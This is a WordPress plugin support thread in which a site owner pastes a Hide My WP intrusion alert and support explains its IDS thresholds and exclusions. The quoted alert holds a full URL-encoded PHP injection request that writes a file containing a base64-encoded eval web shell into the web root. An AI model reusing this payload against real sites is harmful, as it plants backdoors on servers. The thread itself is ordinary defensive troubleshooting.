Home Forums WordPress Plugins Hide My WP HMWP Alert

This topic is: not resolved
Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • April 18, 2016 at 2:29 pm #9037
    sevensquare
    Post count: 4

    Hi !

    I just got an email alert from my HMWP plugin.

    It told me that a potential attack has been detected and displays all the informations bellow.
    Is that problematic or just a security alert ?

    In my admin intrusions section, I got logs that I can’t understand its meaning (see attachment). Could you help me with that ?

    Thanks in advance !

    pierre

    The following potential attack has been detected by HMWP IDS

    . If it’s you please Exclude that parameter or increase Notify Threshold from IDS settings.
    In most cases you don’t need to do anything. Hide My WP protects you!

    IP: 140.117.150.103
    User ID:
    Date: 2016-04-18T14:02:46+00:00
    Total Impact: 156
    Affected tags: xss csrf sqli id lfi rfe

    Affected parameters: REQUEST.1=%40ini_set%28%26quot%3Bdisplay_errors%26quot%3B%2C%26quot%3B0%26quot%3B%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho+%26%23039%3B-%26gt%3B%7C%26%23039%3B%3Bfile_put_contents%28%24_SERVER%5B%26%23039%3BDOCUMENT_ROOT%26%23039%3B%5D.%26%23039%3B%2Fwebconfig.txt.php%26%23039%3B%2Cbase64_decode%28%26%23039%3BPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%26%23039%3B%29%29%3Becho+%26%23039%3B%7C%26lt%3B-%26%23039%3B%3B, GET.1=%40ini_set%28%26quot%3Bdisplay_errors%26quot%3B%2C%26quot%3B0%26quot%3B%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho+%26%23039%3B-%26gt%3B%7C%26%23039%3B%3Bfile_put_contents%28%24_SERVER%5B%26%23039%3BDOCUMENT_ROOT%26%23039%3B%5D.%26%23039%3B%2Fwebconfig.txt.php%26%23039%3B%2Cbase64_decode%28%26%23039%3BPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%26%23039%3B%29%29%3Becho+%26%23039%3B%7C%26lt%3B-%26%23039%3B%3B,

    Request URI: /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
    Origin: 10.0.97.17

    • This topic was modified 9 years, 3 months ago by sevensquare.
    Attachments:
    You must be logged in to view attached files.
    April 19, 2016 at 7:05 am #9049
    Suman M.
    Post count: 12480

    Hi, HMWP IDS detects malicious requests coming to your site and notify you about it. But all these requests might not be harmful and you need not worry as HMWP IDS will take care of this and will block the malicious requests if Impact level is more than 20 (default value specified in HMWP IDS). You can stop receiving emails regarding this by setting “Notification Threshold” option to 0 in IDS Firewall tab.

    Note: If in case, valid request is also listed as intrusion then hover over that request name and click on Exclude link to add it to exception list.

    April 21, 2016 at 9:31 am #9110
    sevensquare
    Post count: 4

    Hi!

    Thanks for your answer !!

    An other question, I have install jepack plugin to manage easier the website.
    But lots of IDS alerts are sended.
    I have allowed IDs concerned but doesnt matter, other alerts are sended.

    Is there a way to give total permission to Jetpack to access to website ?

    Thanks again,

    pierre

    April 21, 2016 at 10:07 pm #9117
    Suman M.
    Post count: 12480

    You can go to – Dashboard >> Intrusions; then hover over the request name (that you think are valid) and click on Exclude link to add it to exception list.
    You can also try increasing “Block Threshold” option to about 30 under IDS firewall tab.

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.